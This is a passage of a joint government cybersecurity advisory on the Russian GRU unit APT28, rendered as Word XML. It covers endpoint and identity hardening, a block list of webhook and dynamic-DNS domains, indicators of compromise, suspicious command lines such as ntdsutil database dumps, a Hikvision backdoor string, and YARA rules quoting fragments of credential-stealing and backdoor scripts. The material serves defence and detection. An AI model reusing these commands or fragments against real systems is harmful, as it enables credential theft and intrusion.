        <w:t>Enable optional security features in Windows to harden endpoints and mitigate initial access techniques [D3-AH]: Enable attack surface reduction rules to prevent executable content from email [D3-ABPI].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enable attack surface reduction rules to prevent execution of files from globally writeable directories, such as Downloads or %APPDATA% [D3-EAL]. Unless users are involved in the development of scripts, limit the local execution of scripts (such as batch scripts, VBScript, JScript/JavaScript, and PowerShell [10]) to known scripts [D3-EI], and audit execution attempts. Disable Windows Host Scripting functionality and configure PowerShell to run in Constrained mode [D3-ACH].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Where feasible, implement allowlisting for applications and scripts to limit execution to only those needed for authorized activities, blocking all others by default [D3-EAL].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider using open source SIGMA rules as a baseline for detecting and alerting on suspicious file execution or command parameters [D3-PSA]. Use services that provide enhanced browsing services and safe link checking [D3-URA]. Significant reductions in successful spearphishing attempts were noted when email providers began offering link checking and automatic file detonation to block malicious content.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Where possible, block logins from public VPNs, including exit nodes in the same country as target systems, or, if they need to be allowed, alert on them for further investigation. Most organizations should not need to allow incoming traffic, especially logins to systems, from VPN services [D3-NAM]. Educate users to only use approved corporate systems for relevant government and military business and avoid the use of personal accounts on cloud email providers to conduct official business. Network administrators should also audit both email and web request logs to detect such activity.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Many organizations may not need to allow outgoing traffic to hosting and API mocking services, which are frequently used by GRU unit 26165.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Organizations should consider alerting on or blocking the following services, with exceptions allowlisted for legitimate activity [D3-DNSDL]. *.000[.]pe *.1cooldns[.]com *.42web[.]io *.4cloud[.]click *.accesscan[.]org *.bumbleshrimp[.]com *.camdvr[.]org *.casacam[.]net *.ddnsfree[.]com *.ddnsgeek[.]com *.ddnsguru[.]com *.dynuddns[.]com *.dynuddns[.]net *.free[.]nf *.freeddns[.]org *.frge[.]io *.glize[.]com *.great-site[.]net *.infinityfreeapp[.]com *.kesug[.]com *.loseyourip[.]com *.lovestoblog[.]com *.mockbin[.]io *.mockbin[.]org *.mocky[.]io *.mybiolink[.]io *.mysynology[.]net *.mywire[.]org *.ngrok[.]io *.ooguy[.]com *.pipedream[.]net *.rf[.]gd *.urlbae[.]com *.webhook[.]site *.webhookapp[.]com *.webredirect[.]org *.wuaze[.]com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Heuristic detections for web requests to new subdomains, including of the above providers, may uncover malicious phishing activity [D3-DNRA]. Logging the requests for each sub-domain requested by users on a network, such as in DNS or firewall logs, may enable system administrators to identify new targeting and victims.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Identity and Access Management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Organizations should take measures to ensure strong access controls and mitigate against common credential theft techniques: Use MFA with strong factors, such as passkeys or PKI smartcards, and require regular re-authentication [D3-MFA]. [11], [12] Strong authentication factors are not guessable using dictionary techniques, so they resist brute force attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement other mitigations for privileged accounts: including limiting the number of admin accounts, considering using hardware MFA tokens, and regularly reviewing all privileged user accounts [D3-JFAPA].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Separate privileged accounts by role and alert on misuse of privileged accounts [D3-UAP]. For example, email administrator accounts should be different from domain administrator accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Reduce reliance on passwords; instead, consider using services like single sign-on [D3-TBA].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For organizations using on-premises authentication and email services, plan to disable NTLM entirely and migrate to more robust authentication processes such as PKI certificate authentication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Do not store passwords in Group Policy Preferences (GPP). Remove all passwords previously included in GPP and change all passwords on the corresponding accounts [D3-CH]. [13] Use account throttling or account lockout [D3-ANET]: Throttling is preferred to lockout. Throttling progressively increases time delay between successive login attempts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account lockout can leave legitimate users unable to access their accounts and requires access to an account recovery process.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Account lockout can provide a malicious actor with an easy way to launch a Denial of Service (DoS).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>If using lockout, then allowing 5 to 10 attempts before lockout is recommended.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use a service to check for compromised passwords before using them [D3- SPP]. For example, "Have I Been Pwned" can be used to check whether a password has been previously compromised without disclosing the potential password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Change all default credentials [D3-CRO] and disable protocols that use weak authentication (e.g., clear-text passwords or outdated and vulnerable authentication or encryption protocols) or do not support multi-factor authentication [D3-ACH] [D3-ET]. Always configure access controls carefully to ensure that only well-maintained and well-authenticated accounts have access. [13] IP Camera Mitigations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following mitigation techniques for IP cameras can be used to defend against this type of malicious activity: Ensure IP cameras are currently supported. Replace devices that are out of support.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply security patches and firmware updates to all IP cameras [D3-SU]. Disable remote access to the IP camera, if unnecessary [D3-ITF].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure cameras are protected by a security appliance, if possible, such as by using a firewall to prevent communication with the camera from IP addresses not on an allowlist [D3-NAM].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>If remote access to IP camera feeds is required, ensure authentication is enabled [D3-AA] and use a VPN to connect remotely [D3-ET]. Use MFA for management accounts if supported [D3-MFA].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable Universal Plug and Play (UPnP), Peer-to-Peer (P2P), and Anonymous Visit features on IP cameras and routers [D3-NI].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Turn off other ports/services not in use (e.g., FTP, web interface, etc.) [D3-ACH].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>If supported, enable authenticated RTSP access only [D3-AA].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Review all authentication activity for remote access to make sure it is valid and expected [D3-UBA]. Investigate any unexpected or unusual activity. Audit IP camera user accounts to ensure they are an accurate reflection of your organization and that they are being used as expected [D3-UAP]. Configure, tune, and monitor logging-if available-on the IP camera. Indicators of Compromise (IOCs)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Note: Specific IoCs may no longer be actor controlled, may themselves be compromised infrastructure or email accounts, or may be shared infrastructure such as public VPN or Tor exit nodes. Care should be taken when basing triaging logs or developing detection rules on these indicators. GRU unit 26165 almost certainly uses extensive further infrastructure and TTPs not specifically listed in this report. Utilities and scripts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Legitimate utilities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Unauthorized or unusual use of the following legitimate utilities can be an indication of a potential compromise: ntdsutil - A legitimate Windows executable used by threat actors to export contents of Active Directory wevtutil - A legitimate Windows executable used by threat actors to delete event logs vssadmin - A legitimate Windows executable possibly used by threat actors to make a copy of the server's C: drive ADexplorer - A legitimate window executable to view, edit, and backup Active Directory Certificate Services OpenSSH - The Windows version of a legitimate open source SSH client schtasks - A legitimate Windows executable used to create persistence using scheduled tasks whoami - A legitimate Windows executable used to retrieve the name of the current user tasklist - A legitimate Windows executable used to retrieve the list of running processes hostname - A legitimate Windows executable used to retrieve the device name arp - A legitimate Windows executable used to retrieve the ARP table for mapping the network environment systeminfo - A legitimate Windows executable used to retrieve a comprehensive summary of device and operating system information net - A legitimate Windows executable used to retrieve detailed user information wmic - A legitimate Windows executable used to interact with Windows Management Instrumentation (WMI), such as to retrieve letters assigned to logical partitions on storage drives cacls - A legitimate Windows executable used to modify permissions on files icacls - A legitimate Windows executable used to modify permissions to files and handle integrity levels and ownership ssh - A legitimate Windows executable used to establish network shell connections reg - A legitimate Windows executable used to add to or modify the system registry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Note: Additional heuristics are needed for effective hunting for these and other living off the land (LOTL) binaries to avoid being overwhelmed by false positives if these legitimate management tools are used regularly. See the joint guide, Identifying and Mitigating Living Off the Land Techniques, for guidance on developing a multifaceted cybersecurity strategy that enables behavior analytics, anomaly detection, and proactive hunting, which are part of a comprehensive approach to mitigating cyber threats that employ LOTL techniques.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Malicious scripts Certipy - An open source python tool for enumerating and abusing Active Directory Certificate Services Get-GPPPassword.py - An open source python script for finding insecure passwords stored in Group Policy Preferences ldap-dump.py - A script for enumerating user accounts and other information in Active Directory Hikvision backdoor string: "YWRtaW46MTEK"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Suspicious command lines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the following utilities are legitimate, and using them with the command lines shown may also be legitimate, these command lines are often used during malicious activities and could be an indication of a compromise: edge.exe "-headless-new -disable-gpu" ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit ssh -Nf schtasks /create /xml Outlook CVE Exploitation IOCs md-shoeb@alfathdoor[.]com[.]sa jayam@wizzsolutions[.]com accounts@regencyservice[.]in m.salim@tsc-me[.]com vikram.anand@4ginfosource[.]com mdelafuente@ukwwfze[.]com sarah@cosmicgold469[.]co[.]za franch1.lanka@bplanka[.]com commerical@vanadrink[.]com maint@goldenloaduae[.]com karina@bhpcapital[.]com tv@coastalareabank[.]com ashoke.kumar@hbclife[.]in 213[.]32[.]252[.]221 124[.]168[.]91[.]178 194[.]126[.]178[.]8 159[.]196[.]128[.]120 Commonly Used Webmail Providers portugalmail[.]pt mail-online[.]dk email[.]cz seznam[.]cz Malicious Archive Filenames Involving CVE-2023-38831 calc.war.zip news_week_6.zip Roadmap.zip SEDE-PV-2023-10-09-1_EN.zip war.zip Zeyilname.zip Brute Forcing IP Addresses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Disclaimer: These IP addresses date June 2024 through August 2024. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>June 2024 July 2024 August 2024 192[.]162[.]174[.]94 207[.]244[.]71[.]84 31[.]135[.]199[.]145 79[.]184[.]25[.]198 91[.]149[.]253[.]204 103[.]97[.]203[.]29 162[.]210[.]194[.]2 31[.]42[.]4[.]138 79[.]185[.]5[.]142 91[.]149[.]254[.]75 209[.]14[.]71[.]127 46[.]112[.]70[.]252 83[.]10[.]46[.]174 91[.]149[.]255[.]122 109[.]95[.]151[.]207 46[.]248[.]185[.]236 83[.]168[.]66[.]145 91[.]149[.]255[.]19 64[.]176[.]67[.]117 83[.]168[.]78[.]27 91[.]149[.]255[.]195 64[.]176[.]69[.]196 83[.]168[.]78[.]31 91[.]221[.]88[.]76 64[.]176[.]70[.]18 83[.]168[.]78[.]55 93[.]105[.]185[.]139 64[.]176[.]70[.]238 83[.]23[.]130[.]49 95[.]215[.]76[.]209 64[.]176[.]71[.]201 83[.]29[.]138[.]115 138[.]199[.]59[.]43 70[.]34[.]242[.]220 89[.]64[.]70[.]69 147[.]135[.]209[.]245 70[.]34[.]243[.]226 90[.]156[.]4[.]204 178[.]235[.]191[.]182 70[.]34[.]244[.]100 91[.]149[.]202[.]215 178[.]37[.]97[.]243 70[.]34[.]245[.]215 91[.]149[.]203[.]73 185[.]234[.]235[.]69 70[.]34[.]252[.]168 91[.]149[.]219[.]158 192[.]162[.]174[.]67 70[.]34[.]252[.]186 91[.]149[.]219[.]23 194[.]187[.]180[.]20 70[.]34[.]252[.]222 91[.]149[.]223[.]130 212[.]127[.]78[.]170 70[.]34[.]253[.]13 91[.]149[.]253[.]118 213[.]134[.]184[.]167 70[.]34[.]253[.]247 91[.]149[.]253[.]198 70[.]34[.]254[.]245 91[.]149[.]253[.]20 Detections Customized NTLM listener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rule APT28_NTLM_LISTENER {</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meta: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description = "Detects NTLM listeners including APT28's custom one"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strings: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$command_1 = "start-process powershell.exe -WindowStyle hidden"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$command_2 = "New-Object System.Net.HttpListener"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$command_3 = "Prefixes.Add('http://localhost:8080/')"</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$command_4 = "-match 'Authorization'"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$command_5 = "GetValues('Authorization')"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$command_6 = "Request.RemoteEndPoint.Address.IPAddressToString"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$command_7 = "@(0x4e,0x54,0x4c,0x4d, 0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x28,0x00,0x00,0x01,0x82,0x00,0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)"</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$command_8 = ".AllKeys"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$variable_1 = "$NTLMAuthentication" nocase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$variable_2 = "$NTLMType2" nocase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$variable_3 = "$listener" nocase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$variable_4 = "$hostip" nocase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$variable_5 = "$request" nocase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$variable_6 = "$ntlmt2" nocase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$variable_7 = "$NTLMType2Response" nocase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$variable_8 = "$buffer" nocase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condition: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 of ($command_*)</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all of ($variable_*)</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HEADLACE shortcut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rule APT28_HEADLACE_SHORTCUT {</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meta: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description = "Detects the HEADLACE backdoor shortcut dropper. Rule is meant for threat hunting."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strings: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$type = "[InternetShortcut]" ascii nocase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$url = "file://"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$edge = "msedge.exe"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$icon = "IconFile"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condition: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all of them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HEADLACE credential dialogbox phishing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rule APT28_HEADLACE_CREDENTIALDIALOG {</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meta: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description = "Detects scripts used by APT28 to lure user into entering credentials"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strings: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$command_1 = "while($true)"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$command_2 = "Get-Credential $(whoami)"</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$command_3 = "Add-Content"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$command_4 = ".UserName"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$command_5 = ".GetNetworkCredential().Password"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$command_6 = "GetNetworkCredential().Password.Length -ne 0"</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condition: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 of them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HEADLACE core script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rule APT28_HEADLACE_CORE {</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meta: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description = "Detects HEADLACE core batch scripts"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strings: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$chcp = "chcp 65001" ascii</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$headless = "start \"\" msedge --headless=new --disable-gpu" ascii</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$command_1 = "taskkill /im msedge.exe /f" ascii</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$command_2 = "whoami&gt;\"%programdata%" ascii</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$command_3 = "timeout" ascii</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$command_4 = "copy \"%programdata%\\" ascii</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$non_generic_del_1 = "del /q /f \"%programdata%" ascii</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$non_generic_del_3 = "del /q /f \"%userprofile%\\Downloads\\" ascii</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$generic_del = "del /q /f" ascii</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condition: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$chcp</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$headless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 of ($non_generic_del_*)</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($generic_del)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 of ($command_*)</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MASEPIE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rule APT28_MASEPIE {</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meta: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description = "Detects MASEPIE python script"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strings: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$masepie_unique_1 = "os.popen('whoami').read()"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$masepie_unique_2 = "elif message == 'check'"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$masepie_unique_3 = "elif message == 'send_file':"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$masepie_unique_4 = "elif message == 'get_file'"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$masepie_unique_5 = "enc_mes('ok'"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$masepie_unique_6 = "Bad command!'.encode('ascii'"</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$masepie_unique_7 = "{user}{SEPARATOR}{k}"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$masepie_unique_8 = "raise Exception(\"Reconnect"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condition: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 of ($masepie_unique_*)</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STEELHOOK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rule APT28_STEELHOOK {</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meta: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description = "Detects APT28's STEELHOOK powershell script"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strings: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$s_1 = "$($env:LOCALAPPDATA\\\\Google\\\\Chrome\\\\User Data\\\\Local State)"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$s_2 = "$($env:LOCALAPPDATA\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data)"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$s_3 = "$($env:LOCALAPPDATA\\\\Microsoft\\\\Edge\\\\User Data\\\\Local State)"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$s_4 = "$($env:LOCALAPPDATA\\\\Microsoft\\\\Edge\\\\User Data\\\\Default\\\\Login Data)"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$s_5 = "os_crypt.encrypted_key"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$s_6 = "System.Security.Cryptography.DataProtectionScope"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$s_7 = "[system.security.cryptography.protectdata]::Unprotect"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$s_8 = "Invoke-RestMethod"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condition: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all of them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PSEXEC</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rule GENERIC_PSEXEC {</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meta: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description = "Detects SysInternals PSEXEC executable"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strings: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$sysinternals_1 = "SYSINTERNALS SOFTWARE LICENCE TERMS"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$sysinternals_2 = "/accepteula"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$sysinternals_3 = "Software\\Sysinternals"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$network_1 = "\\\\%s\\IPC$"</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$network_2 = "\\\\%s\\ADMIN$\\%s"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$network_3 = "\\Device\\LanmanRedirector\\%s\\ipc$"</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$psexec_1 = "PSEXESVC"</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$psexec_2 = "PSEXEC-{}-"</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$psexec_3 = "Copying %s to %s..."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$psexec_4 = "gPSINFSVC"</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condition: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uint16( 0x0 ) ==0x5a4d )</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uint16( uint32( 0x3c )) == 0x4550 )</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filesize &lt; 1024KB</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any of ($sysinternals_*) and any of ($psexec_*) )</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( 2 of ($network_*) and 2 of ($psexec_*))</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Cybersecurity Industry Tracking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cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to GRU unit 26165 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&amp;CK G0007 and commonly used within the cybersecurity community: APT28 [14] Fancy Bear [14] Forest Blizzard [14] Blue Delta [15]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Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government's understanding for all activity related to these groupings. Further Reference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 search for the presence of malicious email messages targeting CVE-2023- 23397, network defenders may consider using the script published by Microsoft: https://aka.ms/CVE-2023-23397ScriptDoc.</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the Impacket TTP, network defenders may consider using the following publicly available Impacket YARA detection rule: https://github.com/Neo23x0/signature- base/blob/master/yara/gen_impacket_tools.yar Works Cited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 Microsoft. Defending Ukraine: Early Lessons from the Cyber War. 2022. https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine- early-lessons-from-the-cyber-war/ [2] FBI et al. Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. 2024. https://media.defense.gov/2024/Feb/27/2003400753/- 1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF [3] NSA et al. Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. 2021.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://media.defense.gov/2021/Jul/01/2002753896/-1/- 1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF [4] ANSSI. Campagnes d'attaques du mode op'eratoire APT28 depuis 2021. 2023. https://cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/ [5] ANSSI. Targeting and compromise of french entities using the APT28 intrusion set. 2025. https://cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-007/ [6] Polish Cyber Command. Detecting Malicious Activity Against Microsoft Exchange Servers. 2023. https://www.wojsko- polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against- microsoft-exchange-servers/ [7] IBM. Israel-Hamas Conflict Lures to Deliver Headlace Malware. 2023. https://securityintelligence.com/x-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>force/itg05-ops-leverage-israel-hamas- conflict-lures-to-deliver-headlace-malware/ [8] CERT-UA. APT28: From Initial Attack to Creating Domain Controller Threats in an Hour. 2023. https://cert.gov.ua/article/6276894 [9] NSA. Embracing a Zero Trust Security Model. 2021.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://media.defense.gov/2021/Feb/25/2002588479/-1/- 1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF [10] NSA et al. Keeping PowerShell: Security Measures to Use and Embrace. 2022. https://media.defense.gov/2022/Jun/22/2003021689/-1/- 1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF [11] National Institute of Standards and Technology (NIST). Special Publication 800-63B: Digital Identity Guidelines - Authentication and Lifecycle Management. 2020. https://pages.nist.gov/800-63-3/sp800-63b.html [12] NSA. Selecting Secure Multi-factor Authentication Solutions. October 16, 2020. https://media.defense.gov/2024/Jul/31/2003515137/-1/- 1/0/MULTIFACTOR_AUTHENTICATION_SOLUTIONS_UOO17091520.PDF [13] NSA and CSA. NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. 2023.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://media.defense.gov/2023/Oct/05/2003314578/-1/- 1/0/JOINT_CSA_TOP_TEN_MISCONFIGURATIONS_TLP-CLEAR.PDF</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 Department of Justice. Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation's Main Intelligence Directorate of the General Staff (GRU). 2024.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.justice.gov/archives/opa/pr/justice-department-conducts-court- authorized-disruption-botnet-controlled-russian [15] Recorded Future. GRU's BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns. 2024.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf Disclaimer of endorsement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information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes. Purpose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document was developed in furtherance of the authoring agencies' cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. Contact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United States organizations National Security Agency (NSA) Cybersecurity Report Feedback: CybersecurityReports@nsa.gov Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, MediaRelations@nsa.gov Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) U.S. organizations are encouraged to reporting suspicious or criminal activity related to information in this advisory to CISA via the agency's Incident Reporting System, its 24/7 Operations Center (report@cisa.gov or 888-282-0870), or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment user for the activity; the name of the submitting company or organization; and a designated point of contact.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Department of Defense Cyber Crime Center (DC3) Defense Industrial Base Inquiries and Cybersecurity Services: DC3.DCISE@us.af.mil Media Inquiries / Press Desk: DC3.Information@us.af.mil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United Kingdom organizations Report significant cyber security incidents to ncsc.gov.uk/report-an- incident (monitored 24/7)</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Germany organizations Bundesnachrichtendienst (BND): Media Relations / Press Desk: +49 30 20 45 36 30, pressestelle@bnd.bund.de BfV Prevention/Economic Protection Unit: +49 30 18792-3322, wirtschaftsschutz@bfv.bund.de BSI Service-Center: +49 800 274 1000, service-center@bsi.bund.de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Czech Republic organizations Security Information Service (BIS): cyber.threats@bis.cz National Cyber and Information Security Agency (N'UKIB): cert.incident@nukib.gov.cz</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Poland organizations Poland Military Counterintelligence Service (SKW): cyber.int@skw.gov.pl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Australian organizations Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.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Canadian organizations Report incidents by emailing CCCS at contact@cyber.gc.ca.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Estonia organizations Estonian Foreign Intelligence Service (EFIS): info@valisluureamet.ee Estonian National Cyber Security Centre (NCSC-EE): ria@ria.ee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French organizations French organizations are encouraged to report suspicious activity or incident related to information found in this advisory by contacting ANSSI/CERT-FR by email at cert-fr@ssi.gouv.fr or by phone at: 3218 or +33 9 70 83 32 18. Appendix A: MITRE ATT&amp;CK tactics and techniques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See Table 2 through Table 14 for all the threat actor tactics and techniques referenced in this advisory. Table 2: Reconnaissance Tactic/Technique Title ID Use Reconnaissance TA0043 Conducted reconnaissance on at least one entity involved in the production of ICS components for railway management. Gather Victim Identity Information: Email Addresses T1589.002 Conducted contact information reconnaissance to identify additional targets in key positions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
